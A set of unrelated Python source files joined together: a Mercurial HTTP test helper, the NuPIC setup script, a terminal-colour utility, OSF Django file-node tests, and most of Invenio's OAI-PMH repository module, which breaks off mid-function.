#!/usr/bin/env python """This does HTTP GET requests given a host:port and path and returns a subset of the headers plus the body of the result.""" from __future__ import absolute_import, print_function import json import os import sys from edenscm.mercurial import util httplib = util.httplib try: import msvcrt msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY) msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY) except ImportError: pass twice = False if "--twice" in sys.argv: sys.argv.remove("--twice") twice = True headeronly = False if "--headeronly" in sys.argv: sys.argv.remove("--headeronly") headeronly = True formatjson = False if "--json" in sys.argv: sys.argv.remove("--json") formatjson = True hgproto = None if "--hgproto" in sys.argv: idx = sys.argv.index("--hgproto") hgproto = sys.argv[idx + 1] sys.argv.pop(idx) sys.argv.pop(idx) tag = None def request(host, path, show): assert not path.startswith("/"), path global tag headers = {} if tag: headers["If-None-Match"] = tag if hgproto: headers["X-HgProto-1"] = hgproto conn = httplib.HTTPConnection(host) conn.request("GET", "/" + path, None, headers) response = conn.getresponse() print(response.status, response.reason) if show[:1] == ["-"]: show = sorted(h for h, v in response.getheaders() if h.lower() not in show) for h in [h.lower() for h in show]: if response.getheader(h, None) is not None: print("%s: %s" % (h, response.getheader(h))) if not headeronly: print() data = response.read() # Pretty print JSON. This also has the beneficial side-effect # of verifying emitted JSON is well-formed. if formatjson: # json.dumps() will print trailing newlines. Eliminate them # to make tests easier to write. data = json.loads(data) lines = json.dumps(data, sort_keys=True, indent=2).splitlines() for line in lines: print(line.rstrip()) else: sys.stdout.write(data) if twice and response.getheader("ETag", None): tag = response.getheader("ETag") return response.status status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) if twice: status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) if 200 <= status <= 305: sys.exit(0) sys.exit(1)
# ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2015, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see http://www.gnu.org/licenses. # # http://numenta.org/licenses/ # ---------------------------------------------------------------------- """Installation script for Python nupic package.""" import os import setuptools import sys from setuptools import setup, find_packages, Extension REPO_DIR = os.path.dirname(os.path.realpath(__file__)) def getVersion(): """ Get version from local file. """ with open(os.path.join(REPO_DIR, "VERSION"), "r") as versionFile: return versionFile.read().strip() def parse_file(requirementFile): try: return [ line.strip() for line in open(requirementFile).readlines() if not line.startswith("#") ] except IOError: return [] def findRequirements(): """ Read the requirements.txt file and parse into requirements for setup's install_requirements option. """ requirementsPath = os.path.join(REPO_DIR, "external", "common", "requirements.txt") requirements = parse_file(requirementsPath) return requirements if __name__ == "__main__": requirements = findRequirements() setup( name="nupic", version=getVersion(), install_requires=requirements, package_dir = {"": "src"}, packages=find_packages("src"), namespace_packages = ["nupic"], package_data={ "nupic.support": ["nupic-default.xml", "nupic-logging.conf"], "nupic": ["README.md", "LICENSE.txt"], "nupic.data": ["*.json"], "nupic.frameworks.opf.exp_generator": ["*.json", "*.tpl"], "nupic.frameworks.opf.jsonschema": ["*.json"], "nupic.swarming.exp_generator": ["*.json", "*.tpl"], "nupic.swarming.jsonschema": ["*.json"], "nupic.datafiles": ["*.csv", "*.txt"], }, include_package_data=True, zip_safe=False, description="Numenta Platform for Intelligent Computing", author="Numenta", author_email="[email protected]", url="https://github.com/numenta/nupic", classifiers=[ "Programming Language :: Python", "Programming Language :: Python :: 2", "License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)", "Operating System :: MacOS :: MacOS X", "Operating System :: POSIX :: Linux", # It has to be "5 - Production/Stable" or else pypi rejects it! "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Science/Research", "Topic :: Scientific/Engineering :: Artificial Intelligence" ], long_description=( "Numenta Platform for Intelligent Computing: a machine intelligence " "platform that implements the HTM learning algorithms. HTM is a " "detailed computational theory of the neocortex. At the core of HTM " "are time-based continuous learning algorithms that store and recall " "spatial and temporal patterns. NuPIC is suited to a variety of " "problems, particularly anomaly detection and prediction of streaming " "data sources.\n\n" "For more information, see http://numenta.org or the NuPIC wiki at " "https://github.com/numenta/nupic/wiki.") )
"""Index interaction code """
from typing import List, TypeVar C = TypeVar('C') # how to constrain to only the closure below? def color_factory(color_code: str) -> C: def apply(text: str, format_spec: str = '') -> str: return color_code + format(text, format_spec) + '\033[0m' def mix(*colors: C) -> List[C]: return [color_factory(c.color_code + color_code) for c in colors] apply.mix, apply.color_code = mix, color_code return apply class Colors: BLUE = color_factory('\033[94m') GREEN = color_factory('\033[92m') YELLOW = color_factory('\033[93m') RED = color_factory('\033[91m') MAGENTA = color_factory('\033[95m') CYAN = color_factory('\033[96m') ORANGE = color_factory('\033[38;5;208m') BOLD = color_factory('\033[1m') DIM = color_factory('\033[2m') BLUE_BOLD, BLUE_DIM = BLUE.mix(BOLD, DIM) GREEN_BOLD, GREEN_DIM = GREEN.mix(BOLD, DIM) YELLOW_BOLD, YELLOW_DIM = YELLOW.mix(BOLD, DIM) RED_BOLD, RED_DIM = RED.mix(BOLD, DIM) MAGENTA_BOLD, MAGENTA_DIM = MAGENTA.mix(BOLD, DIM) CYAN_BOLD, CYAN_DIM = CYAN.mix(BOLD, DIM) ORANGE_BOLD, ORANGE_DIM = ORANGE.mix(BOLD, DIM)
import pytest from django.contrib.contenttypes.models import ContentType from addons.osfstorage import settings as osfstorage_settings from osf.models import BaseFileNode, Folder, File from osf_tests.factories import ( UserFactory, ProjectFactory ) pytestmark = pytest.mark.django_db @pytest.fixture() def user(): return UserFactory() @pytest.fixture() def project(user): return ProjectFactory(creator=user) @pytest.fixture() def create_test_file(fake): # TODO: Copied from api_tests/utils.py. DRY this up. def _create_test_file(target, user=None, filename=None, create_guid=True): filename = filename or fake.file_name() user = user or target.creator osfstorage = target.get_addon('osfstorage') root_node = osfstorage.get_root() test_file = root_node.append_file(filename) if create_guid: test_file.get_guid(create=True) test_file.create_version(user, { 'object': '06d80e', 'service': 'cloud', osfstorage_settings.WATERBUTLER_RESOURCE: 'osf', }, { 'size': 1337, 'contentType': 'img/png' }).save() return test_file return _create_test_file def test_active_manager_does_not_return_trashed_file_nodes(project, create_test_file): create_test_file(target=project) deleted_file = create_test_file(target=project) deleted_file.delete(user=project.creator, save=True) content_type_for_query = ContentType.objects.get_for_model(project) # root folder + file + deleted_file = 3 BaseFileNodes assert BaseFileNode.objects.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 3 # root folder + file = 2 BaseFileNodes assert BaseFileNode.active.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 2 def test_folder_update_calls_folder_update_method(project, create_test_file): file = create_test_file(target=project) parent_folder = file.parent # the folder update method should be the Folder.update method assert parent_folder.__class__.update == Folder.update # the folder update method should not be the File update method assert parent_folder.__class__.update != File.update # the file update method should be the File update method assert file.__class__.update == File.update
# This file is part of Invenio. # Copyright (C) 2009, 2010, 2011, 2014, 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Receive OAI-PMH 2.0 requests and responds""" __revision__ = "$Id$" from six.moves import cPickle import os import re import time import tempfile import sys import datetime if sys.hexversion < 0x2050000: from glob import glob as iglob else: from glob import iglob from flask import url_for, abort from flask_login import current_user from intbitset import intbitset from six import iteritems from invenio.config import \ CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG, \ CFG_CACHEDIR, \ CFG_CERN_SITE, \ CFG_OAI_DELETED_POLICY, \ CFG_OAI_EXPIRE, \ CFG_OAI_FRIENDS, \ CFG_OAI_IDENTIFY_DESCRIPTION, \ CFG_OAI_ID_FIELD, \ CFG_OAI_ID_PREFIX, \ CFG_OAI_LOAD, \ CFG_OAI_METADATA_FORMATS, \ CFG_OAI_PREVIOUS_SET_FIELD, \ CFG_OAI_PROVENANCE_ALTERED_SUBFIELD, \ CFG_OAI_PROVENANCE_BASEURL_SUBFIELD, \ CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD, \ CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD, \ CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD, \ CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD, \ CFG_OAI_SAMPLE_IDENTIFIER, \ CFG_OAI_SET_FIELD, \ CFG_SITE_NAME, \ CFG_SITE_SUPPORT_EMAIL, \ CFG_SITE_URL, \ CFG_WEBSTYLE_HTTP_USE_COMPRESSION from invenio.base.globals import cfg from invenio.ext.logging import register_exception from invenio.legacy.bibrecord import record_get_field_instances from invenio.legacy.dbquery import run_sql, wash_table_column_name, \ datetime_format from invenio.legacy.oairepository.config import CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC from invenio.legacy.search_engine import record_exists, \ search_unit_in_bibxxx, get_record from invenio_formatter import format_record from invenio.modules.search.api import Query from invenio.utils.date import localtime_to_utc, utc_to_localtime from invenio.utils.html import X, EscapedXMLString CFG_VERBS = { 'GetRecord' : ['identifier', 'metadataPrefix'], 'Identify' : [], 'ListIdentifiers' : ['from', 'until', 'metadataPrefix', 'set', 'resumptionToken'], 'ListMetadataFormats': ['identifier'], 'ListRecords' : ['from', 'until', 'metadataPrefix', 'set', 'resumptionToken'], 'ListSets' : ['resumptionToken'] } CFG_ERRORS = { "badArgument": "The request includes illegal arguments, is missing required arguments, includes a repeated argument, or values for arguments have an illegal syntax:", "badResumptionToken": "The value of the resumptionToken argument is invalid or expired:", "badVerb": "Value of the verb argument is not a legal OAI-PMH verb, the verb argument is missing, or the verb argument is repeated:", "cannotDisseminateFormat": "The metadata format identified by the value given for the metadataPrefix argument is not supported by the item or by the repository:", "idDoesNotExist": "The value of the identifier argument is unknown or illegal in this repository:", "noRecordsMatch": "The combination of the values of the from, until, set and metadataPrefix arguments results in an empty list:", "noMetadataFormats": "There are no metadata formats available for the specified item:", "noSetHierarchy": "The repository does not support sets:" } CFG_MIN_DATE = "1970-01-01T00:00:00Z" CFG_MAX_DATE = "9999-12-31T23:59:59Z" def get_all_field_values(tag): """ Return all existing values stored for a given tag. @param tag: the full tag, e.g. 909C0b @type tag: string @return: the list of values @rtype: list of strings """ table = 'bib%02dx' % int(tag[:2]) return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))] def oai_error(argd, errors): """ Return a well-formatted OAI-PMH error """ out = """<?xml version="1.0" encoding="UTF-8"?> <OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">""" out += X.responseDate()(get_utc_now()) for error_code, error_msg in errors: assert(error_code in CFG_ERRORS) if error_code in ("badArgument", "badVerb"): out += X.request()(oai_get_request_url()) break else: ## There are no badArgument or badVerb errors so we can ## return the whole request information out += X.request(**argd)(oai_get_request_url()) for error_code, error_msg in errors: if error_msg is None: error_msg = CFG_ERRORS[error_code] else: error_msg = "%s %s" % (CFG_ERRORS[error_code], error_msg) out += X.error(code=error_code)(error_msg) out += "</OAI-PMH>" return out def oai_header(argd, verb): """ Return OAI header """ out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\n" out += "<?xml-stylesheet type=\"text/xsl\" href=\"%s\" ?>\n" % ( url_for('oairepository.static', filename='xsl/oairepository/oai2.xsl.v1.0')) out += "<OAI-PMH xmlns=\"http://www.openarchives.org/OAI/2.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd\">\n" #out += "<responseDate>%s</responseDate>" % get_utc_now() out += X.responseDate()(get_utc_now()) if verb: out += X.request(**argd)(oai_get_request_url()) out += "<%s>\n" % verb else: out += X.request()(oai_get_request_url()) return out def oai_footer(verb): """ @return: the OAI footer. """ out = "" if verb: out += "</%s>\n" % (verb) out += "</OAI-PMH>\n" return out def get_field(recid, field): """ Gets list of field 'field' for the record with 'recid' system number. """ digit = field[0:2] bibbx = "bib%sx" % digit bibx = "bibrec_bib%sx" % digit query = "SELECT bx.value FROM %s AS bx, %s AS bibx WHERE bibx.id_bibrec=%%s AND bx.id=bibx.id_bibxxx AND bx.tag=%%s" % (wash_table_column_name(bibbx), wash_table_column_name(bibx)) return [row[0] for row in run_sql(query, (recid, field))] def get_modification_date(recid): """Returns the date of last modification for the record 'recid'. Return empty string if no record or modification date in UTC. """ out = "" res = run_sql("SELECT " + datetime_format('modification_date') + " FROM bibrec WHERE id=%s", (recid,), 1) if res and res[0][0]: out = localtime_to_utc(res[0][0]) return out def get_earliest_datestamp(): """Get earliest datestamp in the database Return empty string if no records or earliest datestamp in UTC. """ out = CFG_MIN_DATE res = run_sql("SELECT " + datetime_format('MIN(creation_date)', False) + " FROM bibrec", n=1) if res and res[0][0]: out = localtime_to_utc(res[0][0]) return out def get_latest_datestamp(): """Get latest datestamp in the database Return empty string if no records or latest datestamp in UTC. """ out = CFG_MAX_DATE res = run_sql("SELECT " + datetime_format('MAX(modification_date)', False) + " FROM bibrec", n=1) if res and res[0][0]: out = localtime_to_utc(res[0][0]) return out def check_date(date): """Check if given date has a correct format, complying to "Complete date" or "Complete date plus hours, minutes and seconds" formats defined in ISO8601.""" if(re.match("\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\dZ)?\Z", date) is not None): return date else: return "" def normalize_date(date, dtime="T00:00:00Z"): """ Normalize the given date to the "Complete date plus hours, minutes and seconds" format defined in ISO8601 (If "hours, minutes and seconds" part is missing, append 'dtime' to date). 'date' must be checked before with check_date(..). Returns empty string if cannot be normalized """ if len(date) == 10: date = date + dtime elif len(date) != 20: date = "" return date def get_record_provenance(recid): """ Return the provenance XML representation of a record, suitable to be put in the about tag. """ record = get_record(recid) provenances = record_get_field_instances(record, CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[:3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[3], CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[4]) out = "" for provenance in provenances: base_url = identifier = datestamp = metadata_namespace = origin_description = harvest_date = altered = "" for (code, value) in provenance[0]: if code == CFG_OAI_PROVENANCE_BASEURL_SUBFIELD: base_url = value elif code == CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG[5]: identifier = value elif code == CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD: datestamp = value elif code == CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD: metadata_namespace = value elif code == CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD: origin_description = value elif code == CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD: harvest_date = value elif code == CFG_OAI_PROVENANCE_ALTERED_SUBFIELD: altered = value if base_url: out += """<provenance xmlns="http://www.openarchives.org/OAI/2.0/provenance" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/provenance http://www.openarchives.org/OAI/2.0/provenance.xsd">""" out += X.originDescription(harvestDate=harvest_date, altered=altered)( X.baseURL()(base_url), X.identifier()(identifier), X.datestamp()(datestamp), X.metadataNamespace()(metadata_namespace), origin_description and X.originDescription(origin_description) or '' ## This is already XML ) out += """</provenance>""" return out def get_record_rights(dummy): """ Return the record rights parts, suitable to be put in the about tag. """ return "" ## FIXME: This need to be thought in a good way. What shall we really ## put in the rights parts? #record = get_record(recid) #rights = record_get_field_instances(record, CFG_OAI_RIGHTS_FIELD[:3], CFG_OAI_RIGHTS_FIELD[3], CFG_OAI_RIGHTS_FIELD[4]) #license = record_get_field_instances(record, CFG_OAI_LICENSE_FIELD[:3], CFG_OAI_LICENSE_FIELD[3], CFG_OAI_LICENSE_FIELD[4]) #holder = date = rights_uri = contact = statement = terms = publisher = license_uri = '' #if rights: #for code, value in rights[0][0]: #if code == CFG_OAI_RIGHTS_HOLDER_SUBFIELD: #holder = value #elif code == CFG_OAI_RIGHTS_DATE_SUBFIELD: #date = value #elif code == CFG_OAI_RIGHTS_URI_SUBFIELD: #rights_uri = value #elif code == CFG_OAI_RIGHTS_CONTACT_SUBFIELD: #contact = value #elif CFG_OAI_RIGHTS_STATEMENT_SUBFIELD: #statement = value #if license: #for code, value in license[0][0]: #if code == CFG_OAI_LICENSE_TERMS_SUBFIELD: #terms = value #elif code == CFG_OAI_LICENSE_PUBLISHER_SUBFIELD: #publisher = value #elif code == CFG_OAI_LICENSE_URI_SUBFIELD: #license_uri = value def print_record(recid, prefix='marcxml', verb='ListRecords', set_spec=None, set_last_updated=None): """Prints record 'recid' formatted according to 'prefix'. - if record does not exist, return nothing. - if record has been deleted and CFG_OAI_DELETED_POLICY is 'transient' or 'deleted', then return only header, with status 'deleted'. - if record has been deleted and CFG_OAI_DELETED_POLICY is 'no', then return nothing. """ record_exists_result = record_exists(recid) == 1 if record_exists_result: sets = get_field(recid, CFG_OAI_SET_FIELD) if set_spec is not None and not set_spec in sets and not [set_ for set_ in sets if set_.startswith("%s:" % set_spec)]: ## the record is not in the requested set, and is not ## in any subset record_exists_result = False if record_exists_result: status = None else: status = 'deleted' if not record_exists_result and CFG_OAI_DELETED_POLICY not in ('persistent', 'transient'): return "" idents = get_field(recid, CFG_OAI_ID_FIELD) if not idents: return "" ## FIXME: Move these checks in a bibtask #try: #assert idents, "No OAI ID for record %s, please do your checks!" % recid #except AssertionError as err: #register_exception(alert_admin=True) #return "" #try: #assert len(idents) == 1, "More than OAI ID found for recid %s. Considering only the first one, but please do your checks: %s" % (recid, idents) #except AssertionError as err: #register_exception(alert_admin=True) ident = idents[0] header_body = EscapedXMLString('') header_body += X.identifier()(ident) if set_last_updated: header_body += X.datestamp()(max(get_modification_date(recid), set_last_updated)) else: header_body += X.datestamp()(get_modification_date(recid)) for set_spec in get_field(recid, CFG_OAI_SET_FIELD): if set_spec and set_spec != CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC: # Print only if field not empty header_body += X.setSpec()(set_spec) header = X.header(status=status)(header_body) if verb == 'ListIdentifiers': return header else: if record_exists_result: metadata_body = format_record(recid, CFG_OAI_METADATA_FORMATS[prefix][0]) metadata = X.metadata(body=metadata_body) provenance_body = get_record_provenance(recid) if provenance_body: provenance = X.about(body=provenance_body) else: provenance = '' rights_body = get_record_rights(recid) if rights_body: rights = X.about(body=rights_body) else: rights = '' else: metadata = '' provenance = '' rights = '' return X.record()(header, metadata, provenance, rights) def oai_list_metadata_formats(argd): """Generates response to oai_list_metadata_formats verb.""" if argd.get('identifier'): recid = oai_get_recid(argd['identifier']) _record_exists = record_exists(recid) if _record_exists != 1 and (_record_exists != -1 or CFG_OAI_DELETED_POLICY == "no"): return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])]) out = "" for prefix, (dummy, schema, namespace) in CFG_OAI_METADATA_FORMATS.items(): out += X.metadataFormat()( X.metadataPrefix(prefix), X.schema(schema), X.metadataNamespace(namespace) ) return oai_header(argd, "ListMetadataFormats") + out + oai_footer("ListMetadataFormats") def oai_list_records_or_identifiers(req, argd): """Generates response to oai_list_records verb.""" verb = argd['verb'] resumption_token_was_specified = False # check if the resumption_token did not expire if argd.get('resumptionToken'): resumption_token_was_specified = True try: cache = oai_cache_load(argd['resumptionToken']) last_recid = cache['last_recid'] argd = cache['argd'] complete_list = cache['complete_list'] complete_list = filter_out_based_on_date_range(complete_list, argd.get('from', ''), argd.get('until', '')) except Exception, e: # Ignore cache not found errors if not isinstance(e, IOError) or e.errno != 2: register_exception(alert_admin=True) req.write(oai_error(argd, [("badResumptionToken", "ResumptionToken expired or invalid: %s" % argd['resumptionToken'])])) return else: last_recid = 0 complete_list = oai_get_recid_list(argd.get('set', ""), argd.get('from', ""), argd.get('until', "")) if not complete_list: # noRecordsMatch error req.write(oai_error(argd, [("noRecordsMatch", "no records correspond to the request")])) return cursor = 0 for cursor, recid in enumerate(complete_list): ## Let's fast-forward the cursor to point after the last recid that was ## disseminated successfully if recid > last_recid: break set_last_updated = get_set_last_update(argd.get('set', "")) req.write(oai_header(argd, verb)) for recid in list(complete_list)[cursor:cursor+CFG_OAI_LOAD]: req.write(print_record(recid, argd['metadataPrefix'], verb=verb, set_spec=argd.get('set'), set_last_updated=set_last_updated)) if list(complete_list)[cursor+CFG_OAI_LOAD:]: resumption_token = oai_generate_resumption_token(argd.get('set', '')) cache = { 'argd': argd, 'last_recid': recid, # FIXME introduce IP check if you use fireroles for guests 'id_user': current_user.get_id(), 'complete_list': complete_list.fastdump(), } oai_cache_dump(resumption_token, cache) expdate = oai_get_response_date(CFG_OAI_EXPIRE) req.write(X.resumptionToken(expirationDate=expdate, cursor=cursor, completeListSize=len(complete_list))(resumption_token)) elif resumption_token_was_specified: ## Since a resumptionToken was used we shall put a last empty resumptionToken req.write(X.resumptionToken(cursor=cursor, completeListSize=len(complete_list))("")) req.write(oai_footer(verb)) oai_cache_gc() def oai_list_sets(argd): """ Lists available sets for OAI metadata harvesting. """ out = "" # note: no flow control in ListSets sets = get_all_sets().values() if not sets: return oai_error(argd, [("noSetHierarchy", "No sets have been configured for this repository")]) for set_ in sets: out += " <set>\n" out += X.setSpec()(set_[0]) + X.setName()(set_[1]) if set_[2]: out += X.setDescription()(set_[2]) out = out + " </set>\n" return oai_header(argd, "ListSets") + out + oai_footer("ListSets") def oai_get_record(argd): """Returns record 'identifier' according to 'metadataPrefix' format for OAI metadata harvesting. - if record does not exist, return oai_error 'idDoesNotExist'. - if record has been deleted and CFG_OAI_DELETED_POLICY is 'transient' or 'deleted', then return only header, with status 'deleted'. - if record has been deleted and CFG_OAI_DELETED_POLICY is 'no', then return oai_error 'idDoesNotExist'. """ recid = oai_get_recid(argd['identifier']) _record_exists = record_exists(recid) if _record_exists == 1 or \ (_record_exists == -1 and CFG_OAI_DELETED_POLICY != 'no'): out = print_record(recid, argd['metadataPrefix'], _record_exists) out = oai_header(argd, "GetRecord") + out + oai_footer("GetRecord") else: return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])]) return out def oai_identify(argd): """Generates a response to oai_identify verb. script_url - *str* URL of the script used to access the service. This is made necessary since the gateway can be accessed either via /oai2d or /oai2d/ (or for backward compatibility: oai2d.py or oai2d.py/), and that the base URL must be returned in the Identify response """ out = X.repositoryName()(CFG_SITE_NAME) out += X.baseURL()(CFG_SITE_URL + '/oai2d') out += X.protocolVersion()("2.0") out += X.adminEmail()(CFG_SITE_SUPPORT_EMAIL) out += X.earliestDatestamp()(get_earliest_datestamp()) out += X.deletedRecord()(CFG_OAI_DELETED_POLICY) out += X.granularity()("YYYY-MM-DDThh:mm:ssZ") if CFG_WEBSTYLE_HTTP_USE_COMPRESSION: out += X.compression()('deflate') out += X.description("""<oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">""" + X.scheme()("oai") + X.repositoryIdentifier()(CFG_OAI_ID_PREFIX) + X.delimiter()(":") + X.sampleIdentifier()(CFG_OAI_SAMPLE_IDENTIFIER) + """</oai-identifier>""") out += CFG_OAI_IDENTIFY_DESCRIPTION % {'CFG_SITE_URL': EscapedXMLString(CFG_SITE_URL)} if CFG_OAI_FRIENDS: friends = """<friends xmlns="http://www.openarchives.org/OAI/2.0/friends/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/friends/ http://www.openarchives.org/OAI/2.0/friends.xsd">""" for baseurl in CFG_OAI_FRIENDS: friends += X.baseURL()(baseurl) friends += """</friends>""" out += X.description(friends) out = oai_header(argd, "Identify") + out + oai_footer("Identify") return out def get_utc_now(): """ Return current UTC time in the OAI-PMH format. """ return datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ') def oai_build_request_element(argd=None): """ Build the request tag. """ if argd is None: argd = {} return X.responseDate()(get_utc_now()) + X.request(**argd)("%s/oai2d" % CFG_SITE_URL) def oai_get_request_url(): """Generates requesturl tag for OAI.""" requesturl = CFG_SITE_URL + "/oai2d" return requesturl def oai_get_response_date(delay=0): """Generates responseDate tag for OAI.""" return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(time.time() + delay)) def oai_get_recid(identifier): """Returns the recid corresponding to the OAI identifier. Prefer a non deleted record if multiple recids matches but some of them are deleted (e.g. in case of merging). Returns None if no record matches.""" if identifier: recids = Query('{f}:"{p}"'.format( f=CFG_OAI_ID_FIELD, p=identifier) ).search() if recids: for recid in recids: if record_exists(recid) > 0: return recid return None def get_set_last_update(set_spec=""): """ Returns the last_update of a given set (or of all sets) in UTC """ if set_spec: last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)') + """ FROM "oaiREPOSITORY" WHERE setSpec=%s""", (set_spec, ))[0][0] else: last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)', False) + """ FROM "oaiREPOSITORY" """)[0][0] if last_update: return localtime_to_utc(last_update) else: return None def filter_out_based_on_date_range(recids, fromdate="", untildate="", set_spec=None): """ Filter out recids based on date range.""" if fromdate: fromdate = normalize_date(fromdate, "T00:00:00Z") else: fromdate = get_earliest_datestamp() fromdate = utc_to_localtime(fromdate) if untildate: untildate = normalize_date(untildate, "T23:59:59Z") else: untildate = get_latest_datestamp() untildate = utc_to_localtime(untildate) if set_spec is not None: ## either it has a value or it empty, thus meaning all records last_updated = get_set_last_update(set_spec) if last_updated is not None: last_updated = utc_to_localtime(last_updated) if last_updated > fromdate: fromdate = utc_to_localtime(get_earliest_datestamp()) recids = intbitset(recids) ## Let's clone :-) if fromdate and untildate: recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date BETWEEN %s AND %s", (fromdate, untildate))) elif fromdate: recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date >= %s", (fromdate, ))) elif untildate: recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date <= %s", (untildate, ))) return recids def oai_get_recid_list(set_spec="", fromdate="", untildate=""): """ Returns list of recids for the OAI set 'set', modified from 'fromdate' until 'untildate'. """ ret = intbitset() if not set_spec: ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_SET_FIELD, m='e') if CFG_OAI_DELETED_POLICY != 'no': ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_PREVIOUS_SET_FIELD, m='e') else: ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_SET_FIELD, m='e') ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_SET_FIELD, m='e') if CFG_OAI_DELETED_POLICY != 'no': ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e') ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e') if CFG_OAI_DELETED_POLICY == 'no': ret -= search_unit_in_bibxxx(p='DELETED', f='980__%', m='e') if CFG_CERN_SITE: ret -= search_unit_in_bibxxx(p='DUMMY', f='980__%', m='e') return filter_out_based_on_date_range(ret, fromdate, untildate, set_spec) def oai_generate_resumption_token(set_spec): """Generates unique ID for resumption token management.""" fd, name = tempfile.mkstemp(dir=os.path.join(CFG_CACHEDIR, 'RTdata'), prefix='%s___' % set_spec) os.close(fd) return os.path.basename(name) def oai_delete_resumption_tokens_for_set(set_spec): """ In case a set is modified by the admin interface, this will delete any resumption token that is now invalid. """ aset = set_spec while aset: for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '%s___*' % set_spec)): os.remove(name) aset = aset.rsplit(":", 1)[0] for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '___*')): os.remove(name) def oai_cache_dump(resumption_token, cache): """ Given a resumption_token and the cache, stores the cache. """ cPickle.dump(cache, open(os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token), 'w'), -1) def oai_cache_load(resumption_token): """Restore the cache from the resumption_token.""" fullpath = os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token) if os.path.dirname(os.path.abspath(fullpath)) != os.path.abspath( os.path.join(CFG_CACHEDIR, 'RTdata')): raise ValueError("Invalid path") cache = cPickle.load(open(fullpath)) if cache.get('id_user', 0) == current_user.get_id(): return cache abort(401) def oai_cache_gc(): """ OAI Cache Garbage Collector. """ cache_dir = os.path.join(CFG_CACHEDIR, 'RTdata') if not os.path.isdir(cache_dir): os.makedirs(cache_dir) for file_ in os.listdir(cache_dir): filename = os.path.join(cache_dir, file_) # cache entry expires when not modified during a specified period of time if ((time.time() - os.path.getmtime(filename)) > CFG_OAI_EXPIRE): try: os.remove(filename) except OSError as e: # Most probably the cache was already deleted pass def get_all_sets(): """ Return all the sets. """ res = run_sql("""SELECT "setSpec", "setName", "setDescription" FROM "oaiREPOSITORY" """) ret = {} for row in res: ret[row[0]] = row ## Let's 